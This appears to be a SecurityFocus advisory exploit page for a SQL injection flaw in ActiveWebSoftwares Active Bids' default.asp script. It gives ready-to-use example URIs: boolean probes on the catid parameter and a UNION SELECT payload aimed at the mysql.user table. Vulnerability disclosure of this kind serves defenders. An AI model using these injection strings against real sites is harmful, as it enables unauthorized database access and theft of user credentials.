ActiveWebSoftwares Active Bids 'default.asp' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/catid=39+and+1=1

http://www.example.com/catid=39+and+1=0

http://www.example.com/default.asp?catid=39+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39+from+mysql.user


 

Privacy Statement
Copyright 2010, SecurityFocus